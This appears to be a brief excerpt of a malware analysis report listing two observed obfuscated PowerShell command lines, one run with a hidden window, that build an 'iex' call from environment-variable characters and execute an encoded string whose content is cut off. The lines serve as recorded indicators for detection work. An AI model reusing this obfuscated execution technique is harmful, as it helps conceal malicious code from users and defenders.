Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $ENv:COmsPEC[4,26,25]-join'')(" $(sv 'ofs' '') "+[stRINg]('26o73}68Q87o87}105Q112I30H3_30-80o91<73H19H81Q92<84I91,93H74-30,76I95,80H90-81o83-5<26<102o72Q92_102Q127,78H30,3I30Q80_91I73<19o81...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' &( $ENv:COmsPEC[4,26,25]-join'')(" $(sv 'ofs' '') "+[stRINg]('26o73}68Q87o87}105Q112I30H3_30-80o91<73H19H81Q92<84I91,93H74-30,76I95,80H90-81o83-5<26<102o72Q92_102Q127,78H30,3I30Q80_91I73<19o81...' (with hidden window)